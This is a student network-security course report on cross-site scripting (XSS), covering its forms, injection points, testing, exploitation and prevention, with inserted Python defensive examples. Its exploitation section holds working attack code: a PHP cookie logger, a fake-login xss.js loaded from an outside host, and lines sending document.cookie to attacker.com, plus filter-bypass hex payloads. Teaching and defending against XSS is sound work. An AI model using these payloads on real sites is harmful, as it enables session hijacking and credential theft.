POSTS AND TELECOMMUNICATIONS INSTITUTE OF TECHNOLOGY

HO CHI MINH CITY CAMPUS

NETWORK SECURITY

REPORT FOR THE NETWORK SECURITY COURSE PROJECT

THE XSS ATTACK TECHNIQUE

Supervisor: MSc. L PHC


Student: TRN NH NGC
Student ID: 407170045
Class: D07THM1

Table of Contents
I. GENERAL INTRODUCTION ........ 4
II. INTRODUCTION TO XSS ........ 5
1. Understanding XSS ........ 5
2. The two forms of XSS ........ 5
2.1. Stored XSS ........ 5
2.2. Reflected XSS ........ 6
3. How dangerous XSS is ........ 7
4. The targets XSS aims at ........ 8
III. HOW XSS WORKS ........ 9
IV. BEING WARY OF XSS ........ 12
V. TESTING FOR XSS FLAWS ........ 14
1. Using tools ........ 14
2. Testing with code ........ 14
VI. EXPLOITING XSS FLAWS ........ 16
1. Summary of the steps ........ 17
2. Ways to carry it out ........ 18
2.1. Studying how to take cookies ........ 18
2.2. Studying how to take accounts ........ 18
2.3. XSS attacks using Flash ........ 19
3. Attackers using XSS for scams ........ 22
4. Bypassing character filtering ........ 22
VII. PREVENTING XSS ........ 23
1. For web application designers and developers ........ 23
2. For users ........ 26
VIII. SCOPE AND FEASIBILITY OF THE XSS ATTACK METHOD ........ 27
IX. ASSESSMENT ........ 27
REFERENCES ........ 28

I. GENERAL INTRODUCTION


Websites today are very complex and are usually dynamic: their content is updated by members taking part from everywhere in the world, and most of these websites use cookies to authenticate their users.
This means that whoever holds the cookie is the user. If a hacker obtains a user's cookie, he can impersonate that very user (which is extremely dangerous). So how can hackers get hold of your cookie? There are many ways; here I present one of the methods hackers commonly use, which is attacking through Cross Site Scripting (XSS) flaws.
Cross-Site Scripting (XSS) is one of the most widespread attack techniques today, and it is also one of the important security problems for web developers as well as for web users. Any website that lets users post content without strictly checking it for dangerous code can potentially contain XSS flaws.
XSS is carried out through JavaScript tags, and JavaScript tags can do the following:
1. Change the structure of the whole web page.
2. Create arbitrary HTML elements.
3. Redirect links and forms.
4. Retrieve data and credentials.
5. Send and receive data.
6. Read keystrokes.

II. INTRODUCTION TO XSS


1. Understanding XSS
Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with CSS, the Cascading Style Sheets of HTML), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP ...) HTML tags or dangerous script fragments capable of stealing or setting important information such as cookies, passwords and usernames. The dangerous code that gets injected is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and it may also consist of plain HTML tags.
This method does not target the server system; it mainly attacks the user's own machine. The hacker exploits lax checking by the application and the limited understanding of users, as well as their curiosity, so that users give up their information easily.
Usually the hacker uses a URL to deliver links that trigger programs written in client-side languages such as VBScript or JavaScript, which are then executed in the victim's own browser.

2. The two forms of XSS


2.1. Stored XSS
Stored XSS is the form of attack in which the attacker inserts a dangerous script (usually JavaScript) into our website through some feature (e.g. comments, a guestbook, posting articles), so that when other members visit the website they are hit by the malicious code the attacker planted. Because this malicious code is usually kept in our website's database, it is called "Stored".
Stored XSS arises because we do not properly filter the data that members submit, so the malicious code gets saved into the website's database.

2.2. Reflected XSS


In this form, the attacker usually appends the malicious code to a URL of our website and sends it to the victim; if the victim visits that URL, they are hit by the malicious code. This happens because we do not filter the input that arrives through our own website's URL.

An XSS attack is a dangerous attack: it lets the attacker steal information from the victim's machine through JavaScript, for example by stealing cookies or by injecting malicious code to take control.
XSS is one of the most common flaws; a great many websites are affected by it, which is why more and more people are paying attention to it.
Recently, Brian Krebs of the Washington Post reported that thousands of insecure websites were identified last year, and the site Xssed.com lists nearly 13,000 pages with cross-site scripting (XSS) vulnerabilities.
Example 1: A URL into which a hacker has injected a script to obtain the user's cookie.
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

3. How dangerous XSS is


According to statistics on the security vulnerabilities most frequently attacked in 2009, Cross-Site Scripting (XSS) accounts for a very high share compared with other attack methods.
The XSS technique was first described 5 years ago (from 2007 to 2011), and most of what the technique is capable of is already known. However, we have only fixed part of it. It is no accident that Yahoo Mail let an XSS flaw slip through its filter. An optimal method still lies ahead.
4. The targets XSS aims at
XSS exploitation is usually used to achieve the following malicious results:

* Access sensitive or restricted information
* Steal money (bank transactions, online purchases, ...)
* Track the user's browsing habits
* Change the browser's functionality
* Damage the reputation of an individual or a company
* Destroy the web application
* Denial-of-service attacks
...

III. HOW XSS WORKS
XSS lets an attacker insert code into a link, which is then executed in the user's browser, leading to the loss of cookies, passwords or sessions, or to a virus being planted.
XSS usually takes the following form:
http://www.xxx.vn//index.php?pg=news&cat=<script>alert('Lỗi XSS')</script>
and what appears in the browser is a popup containing the text "Lỗi XSS" ("XSS flaw").
Example 1 above only illustrates the simplest way, adding one's own code to the web page through the URL. In reality there are many ways to add JavaScript code for an XSS-style attack. A hacker can easily make use of the Document Object Model (DOM) to change the context and content of the web application.
Example 2: The following is a list of places where code can be injected:
<a href= "javas&#99;ript&#35;[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<s&#99;ript>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>

(source: http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-0515/0)


The parts in bold (the [code] positions) are where code that steals information can be placed.
Basically, XSS is similar to SQL Injection or Source Injection: it too consists of requests sent from client machines to the server in order to inject information that lies beyond the server's control.
It may be a request sent from a data form, or it may simply be a URL such as:
http://www.example.com/search.cgi?query=<script>alert('XSS was found !');</script>
and your browser may well display the message "XSS was found !".
The code inside the script tag is in no way limited, because it can be replaced entirely by a source file on another server through the script tag's src attribute. This is precisely why we cannot yet gauge the full danger of XSS flaws.
But whereas other attack techniques can change the web server's own data (source code, structure, database), XSS only harms the client side of the website, and its direct victims are the visitors who browse that site. Of course, hackers sometimes also use this technique to deface websites, but even then the attack only touches the site's surface.
Indeed, XSS consists of client-side scripts; these code fragments are run only by the client's browser, so XSS does not affect the website system sitting on the server.
The targets of an XSS attack are none other than the website's other users: when they unwittingly visit pages containing dangerous code planted by hackers, they may be redirected to other websites, have their homepage reset, or worse, lose their password or cookie; their computer may even be infected with viruses, backdoors, worms ...
In the XSS technique, the links the hackers use are usually encoded, so users have a hard time noticing them. Below is the HEX encoding of characters commonly used in XSS flaws in the browser's address bar.

Example 3: A HEX-encoded address.
http://vieclambank.com/search.php?s=">%3C%73%63%72%69%70%74%20%73%72%63%25%33%44%68%74%74%70%25%33%41%25%32%46%25%32%46%6A%73%6E%67%6F%63%2E%76%6E%6E%2E%6D%73%25%32%46%78%73%73%2E%6A%73%3E%3C%25%32%46%73%63%72%69%70%74%3E
IV. BEING WARY OF XSS
There is probably no need to list the dangers of XSS again, but in practice, if you have a little understanding of XSS, you no longer need to fear it. Indeed, you can completely avoid being attacked through XSS flaws if you understand them well.
Every HTML tag can serve as a tool for an XSS attack; among them, the two tags IMG and IFRAME can make your browser load additional websites when the HTML is displayed. An example is the BadTrans worm, a worm that uses the IFRAME tag to spread on systems using Outlook or Outlook Express:
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====---====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
Sometimes while reading mail you find yourself sent to another website; have you considered that you could lose your password? In the past, a whole series of Yahoo mailboxes lost their passwords or had mail stolen for no apparent reason. Perhaps it was because people opened messages without being wary of XSS: it is not only attached files that can harm you. A single piece of HTML sent in a message is enough for you to lose your cookie:
<form action="http://attacker.com/save.asp" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value = document.cookie; window.document.XSS.submit();" src="none.jpg">
So when you receive the message, if you happen to move the mouse over the attached picture, your cookie is taken. With the cookie in hand, the hacker can easily log into your mailbox without knowing your password. I was really surprised to find that Yahoo, while blocking most of the threats from HTML tags, overlooked the IMG tag. Yahoo did patch this serious hole in time, on 12/7/2003, but that is no reason to drop your guard against the "flaws" of websites. If you come across a link of the form:
http://example.com/s...document.cookie)</script>
you will surely examine it carefully before clicking. You might turn off JavaScript in your browser before clicking, or at least be a little wary. But what if you come across a link like this one:
http://example.com/s...72%79%3D<script>

It is actually the same link as before, only encoded. Some of the link's characters have been replaced by their HEX codes, and of course your browser still understands what the real address is. So you may well run into dangerous code if you drop your guard against XSS.
Of course there are many other kinds of attack, some already discovered and some whose extent is not yet known, but within the scope of this report I hope that with the few examples just given you have gained some understanding of XSS.
V. TESTING FOR XSS FLAWS
If you use the source code of ready-made programs, you can consult the lists of known vulnerabilities for that program on websites that carry security information, such as securityfocus.com, securiteam.com ... However, if the website's source code was written by you, that method does not apply. In that case you need automatic scanner programs. If you work in a Windows environment you can use N-Stealth or AppScan, which are quite good scanners: they let you check not only for XSS flaws but also for other flaws in the website and the server.
Of course you do not always need to check everything; if you only want to check a website for XSS flaws, you only need screamingCSS. It is a Perl script that opens connections to the website (using Perl's sockets) to check for your XSS flaws. Moreover, you can use it on both Unix and Windows.
So we can give two main approaches:
1. Using tools
Use one of the many vulnerability scanners for web applications, for example the Web Vulnerability Scanner program, to scan for XSS flaws.
2. Testing with code
Carry out 5 steps:
Step 1: Open the website to be tested.
Step 2: Identify the places (parts) to test for XSS. Any site always has these parts: search, error messages, web forms. XSS flaws mostly lie in these parts; in general, XSS can occur anywhere the user can enter data and then gets something back. For example, we enter the string XSS.
Step 3: Determine whether the site may be vulnerable to XSS by looking at the information returned. For example, if we see something like "XSS not found", or "Account XSS is incorrect", "Login with XSS failed", then the chance that this place is vulnerable to XSS is very high.
Step 4: Once a place likely to be vulnerable has been identified, we insert our own code to test further, for example as follows:
Insert this code: <script>alert('XSS')</script> into the vulnerable place and press Submit; if we get a popup with the word XSS, the site is 100% vulnerable to XSS.
We can also enter the following into the vulnerable form:
<script>alert('CSS Vulnerable')</script>
<i*g csstest=javascript:alert('CSS Vulnerable')>
&{alert('CSS Vulnerable') };
<script>window.open("http://www.google.com/")</script>
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
Example 4: A message showing that the site is certainly vulnerable to XSS.

Note, however, that occasionally a website is vulnerable to XSS but the popup still does not appear; then you have to VIEW SOURCE (and search through it) to check.
When viewing the source, look for the line <script>alert('XSS')</script>; if it is there, the website is 100% vulnerable to XSS.
Suppose http://websitebiloi.com/ is the vulnerable site and we found the vulnerable spot like this: http://websitebiloi.com/index.php?page=<script...< script="">, meaning we can inject code right on the ADDRESS bar.
Step 5: Plan the attack scenario.

VI. EXPLOITING XSS FLAWS


Unlike other flaws, which directly harm the system hosting the website, XSS does no harm to the server system; the main target of XSS is the user!
Web applications often store important information in cookies. A cookie is a piece of information that the application stores on the user's hard disk. Only the application that set the cookie can read it. Therefore the hacker only has a chance to steal the cookie while the user is in a session with the application. After finding a hole in the application, the hacker's first job is to find a page that easily makes users log in.
Here are the traditional steps for exploiting XSS:

1. Summary of the steps


Step 1: The hacker learns that the user is using a web application with an XSS hole.
Step 2: The user receives a link by email or on the web page itself (in a guestbook or a banner it is easy to add a link created by the hacker). Usually the hacker catches the user's attention with phrases that appeal to curiosity, such as "Check your account", "An attractive prize is waiting for you", ...
Step 3: The information (cookie, name, password) is transferred to the hacker's server.
Step 4: The hacker creates a CGI program (in example 3 it is steal.cgi) or a web page that records the stolen information into a file.
Step 5: After receiving the needed information, the hacker can use it to break into the user's account.

2. Ways to carry it out


To understand XSS attacks better, let us look at the following practical example:

2.1. Studying how to take cookies:


First: create a file info.txt and upload it to your host.
Second: create a file cookie.asp or cookie.php with the following content and upload it to your host as well:
<?php
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i, a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('info.txt', 'a');
fwrite($fp, 'Cookie: ' . $cookie . ' IP: ' . $ip . ' date: ' . $date . ' Referer: ' . $referer . "\n");
fclose($fp);
header("Location: http://hostxss.com/");
?>
Third: In replies on forums, in email or on the (XSS-vulnerable) website, we place a link with an enticing introduction or announcement (its hostname being that of the XSS-infected site) of the following form:
http://hostxss.com/search.cgi?query=<script>alert(document.cookie)</script>
or http://hostxss.com/search.cgi?%71%75...72%69%70%74%3E (encoded)
2.2. Studying how to take accounts.
First: create a file info.txt and upload it to your host.
Second: also create a file xss.js and upload it to your host:
This file creates a fake site (a page that looks like the real one); when the user enters their username and password, we redirect them and save the information to the file info.txt.

document.body.innerHTML =
'<img src=images/system/logo_main.gif alt=VieclamBank width=230 height=48 border=0>' +
'<BR><br><br>' +
'<center>Thông tin đăng nhập<BR>' +
'<form action=http://www.hostupfile.com/cookie.php method=POST><table>' +
'<TR><TD>Tên đăng nhập:</TD><TD><input name=ten></TD></TR>' +
'<TR><TD>Mật khẩu:</TD><TD><input name=mk type=password></TD></TR>' +
'<TR><TD></TD><TD><input type=submit value=Login></TD></TR></table></form>' +
'</center>';
Third: We place a link with an enticing introduction or announcement (its hostname being that of the XSS-infected site). Create a link of the following form and send it by mail or post it on the XSS-infected site (after the hostname we add the script tag):
http://hostxss.com/search.php?s="><script src%3Dhttp%3A%2F%2Fjsngoc.vnn.ms%2Fxss.js><%2Fscript>
On the user's side a fake page (the fake site) then appears: the user does not notice, and when they log in, the cookie or the username and password are saved in the file info.txt on the hacker's server.

2.3. XSS attacks using Flash


Besides inserting a dangerous piece of code directly, hackers can also use Flash files to steal information.
Macromedia Flash allows programming in a scripting language built into Flash, ActionScript. ActionScript has a simple syntax similar to JavaScript, C or PERL. For example, the getURL() function is used to call another web page; its parameter is usually a URL such as http://www.yahoo.com.
Example 5: getURL("http://www.yahoo.com")
However, the URL can be replaced by JavaScript:
getURL("javascript:alert(document.cookie)")

The example above makes a message box appear containing the cookie of the web page that hosts the Flash file. So the web page is attacked by injecting a piece of JavaScript into the web application through the Flash file. Another, clearer example of this attack: the following is the command inside the Flash file, and it is executed when the Flash file is loaded:
getURL("javascript:location('http://www.attacker.com?newcookie='+document.cookie)")
So when a user views the web page containing this Flash file, the cookie that the page created for them is immediately sent to the hacker.

How to write ActionScript in Flash


DeviantArt is a well-known website that lets its members upload Flash files for all members to view. A hacker can therefore steal members' cookies, possibly including the web administrator's account, by registering as a member of this web application, uploading a Flash file to the server and waiting for victims to view it. Below is the link to a Flash file like the one presented in the example above.
http://www.deviantart.com/deviation/1386080
In addition, websites that let members submit data in HTML form, such as forums or features for creating a personal signature, can also be targets of this attack, by entering code that calls the Flash file.
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
WIDTH="60"
HEIGHT="48"
id="1"
ALIGN="">
<PARAM NAME=movie VALUE="http://www.ke_tan_cong.com/vidu.swf">
<PARAM NAME=quality VALUE=high>
<PARAM NAME=bgcolor VALUE=#FF9900>
<EMBED src="http://www.ke_tan_cong.com/vidu.swf"
quality=high
bgcolor=#FF9900
WIDTH="60"
HEIGHT="48"
NAME="1"
ALIGN=""
TYPE="application/x-shockwave-flash"
PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>


3. Attackers using XSS for scams


Besides taking cookies, attackers can also direct the user's browser to a web page the attacker has prepared in advance!
Once the attacker has information about the XSS flaw, they can use an IFRAME, with code like this:
<iframe src="http://www.attacker.com" width="1" height="1" style="visibility:hidden"></iframe>
(This fragment opens a web page without the person knowing!)
<meta http-equiv="Refresh" content="0;url=http://www.attacker.com">

You can also use the window open and close functions to redirect the browser to another page of your choosing.
And this way is even better: use the write function to print out a div 1024 wide and 800 high, with position: absolute, left=0, top=0. The div just created then covers the whole screen, and the user is on the attacker's scam page!
Attackers can exploit this flaw for phishing on payment systems, games, shopping, banking and credit sites ... or to plant viruses!
4. Bypassing character filtering
Many careful coders filter out all special characters such as ' or + to prevent commands from being injected through the URL in SQL or XSS attacks, but a skilled attacker easily gets around this by using HEX encoding instead for the exploit.
Hex usage:
http://www.sitebiXSS.com/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Sites for converting text to HEX: http://www.swingnote.com/tools/txt2hex.php or http://ha.ckers.org/xss.html
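The encoded links in Example 3 and in the Hex usage URL above are easy for a site operator to miss when reading access logs. As an added example (not code from the report), the following Python script decodes each request's query string repeatedly, so that double encoding such as %25%33%44 for "=" cannot hide a payload, and flags the parameters that carry script markers; the log lines and the host evil.example are constructed for the demonstration.

```python
"""Detect percent-encoded XSS probes in web-server access logs.

Added example, not the report's own code. The query string is decoded the way
the server eventually sees it: parse_qsl does one round, full_unquote repeats
until nothing changes, so double encoding (%25%33%44 -> %3D -> '=') is undone.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Markers that only make sense in an injected script or handler.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*script\b|javascript\s*:|vbscript\s*:|\bon\w+\s*=|document\.cookie",
    re.IGNORECASE,
)

# Client IP and request target from an Apache "combined"-style log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<target>\S+) HTTP'
)

# Constructed sample log: a normal search; a double-encoded <script src=...>
# probe built like the report's Example 3 (placeholder host evil.example);
# a plainly encoded <script> probe; and a benign value whose encoded "=" and
# "/" must not trigger a finding.
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2011:10:01:22 +0700] "GET /search.php?s=laptop HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2011:10:02:07 +0700] "GET /search.php?s='
    '%22%3E%3C%73%63%72%69%70%74%20%73%72%63%25%33%44%68%74%74%70%25%33%41'
    '%25%32%46%25%32%46%65%76%69%6C%2E%65%78%61%6D%70%6C%65%25%32%46%78%73'
    '%73%2E%6A%73%3E%3C%25%32%46%73%63%72%69%70%74%3E HTTP/1.1" 200 540',
    '10.0.0.7 - - [12/Mar/2011:10:03:41 +0700] "GET /index.php?pg=news&cat='
    '%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 388',
    '10.0.0.3 - - [12/Mar/2011:10:04:13 +0700] "GET /login.php?user=ngoc&next='
    '%2Fhome%3Fseason%3D1 HTTP/1.1" 302 0',
]


def full_unquote(value, max_rounds=5):
    """Percent-decode until the string stops changing (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def scan_target(target):
    """Return [(param, decoded_value)] for query parameters carrying XSS markers."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = full_unquote(value)  # parse_qsl already did the first round
        if XSS_MARKERS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """One finding per suspicious parameter across all parseable log lines."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        for param, decoded in scan_target(match.group("target")):
            findings.append({"ip": match.group("ip"), "target": match.group("target"),
                             "param": param, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(f"{finding['ip']} {finding['param']}={finding['decoded']!r}")
```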
VII. PREVENTING XSS

As mentioned above, an XSS attack can only take place when a web page is delivered to the victim's browser carrying the attacker's malicious script. Nobody has fully measured how dangerous XSS is, but it is also not too difficult to prevent. There are many ways to solve this problem. OWASP (The Open Web Application Standard Project) says that highly secure websites can be built by making sure that dynamically generated pages contain no script tags; for user-supplied data you should do the following:
1. For web application designers and developers
For the data and information entered by users, web application designers and developers need to carry out the following basic steps:
Accept only valid data.

Reject corrupted data.
Continuously check and sanitize data.
Create a list of the HTML tags that are allowed, remove the <script> tag, or enclose script tags in <comment> tags so that the script is treated merely as a quotation.
Filter out any JavaScript/Java/VBScript/ActiveX/Flash-related code.
Filter single and double quotes.
Filter the null character.
Remove the characters > and <, or output-encode them as follows:
    <   &lt;
    >   &gt;
    (   &#40;
    )   &#41;
    #   &#35;
    &   &#38;
Still allow special characters to be entered, but encode them according to a fixed standard.
Encoding
XSS flaws can be avoided when the web server makes sure that the pages it generates are properly encoded, which prevents unwanted scripts from running.
Server-side encoding is a process in which all dynamically generated content passes through an encoding function, where script tags are replaced by their codes.
In general, encoding is recommended because it does not require you to decide which characters are valid and which are not. However, encoding all untrusted data can consume resources and affect the performance of some servers.
In practice, however, there are cases where you must accept every kind of data, or where no suitable filter exists. That is why you need your own ways of solving the problem.
One commonly used method is to encode special characters before printing them to the website, especially anything that could be dangerous to users. In this case <script> will be converted to &lt;script&gt;. It will still be printed on screen, but without endangering the user.
I take the example of the script search.cgi, whose source is:
#!/usr/bin/perl
use CGI;
my $cgi = CGI->new();
my $query = $cgi->param('query');
print $cgi->header();
print "You entered $query";
This is a completely vulnerable script, because it prints the entered data directly. Of course, when printed, the data comes out as HTML code, so not only does it fail to show the input exactly as typed, it also harbours an XSS flaw.
As said above, to solve this problem we can encode the HTML special characters with the function HTML::Entities::encode(). That gives us a more robust source as follows:
#!/usr/bin/perl
use CGI;
use HTML::Entities;
my $cgi = CGI->new();
my $text = $cgi->param('text');
print $cgi->header();
print "You entered ", HTML::Entities::encode($text);

Of course, this method can also be applied to other web application languages (ASP, PHP...). To check the filtering and encoding of data before it is printed, you can use a program written in PHP that was designed specifically to prevent XSS flaws. You can get its source from http://www.mricon.co.../phpfilter.html. Filtering and encoding data is still the best defence against XSS, but if you are using mod_perl on an Apache server you can directly use the Apache::TaintRequest module. The program source then becomes:
use Apache::TaintRequest;
my $apr = Apache::TaintRequest->new(Apache->request);
my $text = $apr->param('text');
$apr->content_type("text/html");
$apr->send_http_header;
$text =~ s/[^A-Za-z0-9 ]//g;   # keep only letters, digits and spaces (the /g flag removes every other character, not just the first)
$apr->print("You entered ", $text);
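As an added example, not part of the report or of the Perl modules it cites, the following Python reproduces the three variants of search.cgi discussed above: the vulnerable one, the entity-encoded one (the behaviour of HTML::Entities::encode, using the encoding table from the list above) and the allowlist one (the regex of the Apache::TaintRequest snippet), together with the "view source" check from section V applied to the generated page. The page template is a constructed stand-in for a real handler.

```python
"""Output encoding versus allowlist filtering for the report's search.cgi.

Added example, not the report's code. ENTITY_MAP follows the encoding table
from the prevention section (plus the two quote characters); the HTML
template is a constructed stand-in for a real request handler.
"""
import re

ENTITY_MAP = {
    "&": "&#38;",
    "#": "&#35;",
    "<": "&lt;",
    ">": "&gt;",
    "(": "&#40;",
    ")": "&#41;",
    '"': "&quot;",
    "'": "&#39;",
}
SPECIAL = re.compile(r"[&#<>()\"']")

# Markup a browser would execute: a script tag, an event-handler attribute
# inside a tag, or a javascript: URL inside an attribute.
ACTIVE_MARKUP = re.compile(
    r"<\s*script\b|<\w+[^>]*\bon\w+\s*=|<\w+[^>]*=\s*[\"']?\s*javascript\s*:",
    re.IGNORECASE,
)


def encode_entities(text):
    """Single-pass replacement, so entities produced here are never re-encoded."""
    return SPECIAL.sub(lambda m: ENTITY_MAP[m.group(0)], text)


def allowlist_filter(text):
    """Keep only letters, digits and spaces: the TaintRequest regex with /g."""
    return re.sub(r"[^A-Za-z0-9 ]", "", text)


def render_vulnerable(query):
    """The original search.cgi: the query is interpolated into the HTML untouched."""
    return f"<html><body>You entered {query}</body></html>"


def render_encoded(query):
    """The fixed search.cgi: encode before interpolating."""
    return f"<html><body>You entered {encode_entities(query)}</body></html>"


def render_allowlisted(query):
    """The mod_perl variant: strip every character outside the allowlist."""
    return f"<html><body>You entered {allowlist_filter(query)}</body></html>"


def reflects_unencoded(page, payload):
    """The 'view source' check from section V: does the raw payload appear?"""
    return payload in page


def contains_active_markup(page):
    """Does the response still carry markup that a browser would execute?"""
    return ACTIVE_MARKUP.search(page) is not None


if __name__ == "__main__":
    probe = "<script>alert('XSS')</script>"  # the report's step-4 test string
    for name, render in (("vulnerable", render_vulnerable),
                         ("encoded", render_encoded),
                         ("allowlisted", render_allowlisted)):
        page = render(probe)
        verdict = "UNSAFE" if contains_active_markup(page) else "safe"
        print(f"{name:11s} {verdict}: {page}")
```

Entity encoding as shown covers the HTML body context of the report's example; a value placed inside an attribute or a script block needs the encoding appropriate to that context.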

2. For users.
Reconfigure the browser so that it prompts the user whether to allow scripting languages to run on their machine. Depending on the level of trust, the user decides.
With Firefox: you can install the add-on YesScript to control scripts from the web.
With IE: go to Options / Settings / ... and disable scripting.
Similarly for Google Chrome and other browsers.
When we visit a new website we must think before clicking links, and with email we must check links and advertising images very carefully. In short, we are safer when we are more vigilant.

VIII. SCOPE AND FEASIBILITY OF THE XSS ATTACK METHOD

Malicious JavaScript can access any of the following information:


Persistent cookies (of the XSS-vulnerable site) maintained by the browser.
In-memory (session) cookies (of the XSS-vulnerable site).
The names of all windows opened from the XSS-vulnerable site.
Any information that can be accessed from the current DOM (such as values or HTML code).
In recent times we have seen that attacks on the XSS flaws of websites still occur in very high numbers, second only to SQL Injection. Therefore the XSS attack method is still considered very feasible to carry out, and such attacks are still widespread.
IX. ASSESSMENT

Threats in the Internet environment

The XSS technique is quite common and easy to apply, and the damage it does can have very serious consequences. Therefore, besides the application checking the validity of data before using it, the most necessary thing is for users to stay alert before entering a new website or when they receive a very attractive email. It can be said that thanks to user vigilance, 90% of the security against this technique is achieved.

REFERENCES:


1. Security - 2009 - Network Security Guide, CompTIA
2. Security - 2010 - 7 Deadliest Attacks - Web App
3. Protecting a Website - student group, Ho Chi Minh City University of Technology
4. http://ha.ckers.org/xss.html
5. http://www.hungry-hackers.com/2010/09/xss-cross-site-scripting-attack.html
6. http://vibe.vn/threads/35350/
7. https://www.owasp.org/index.php/XSS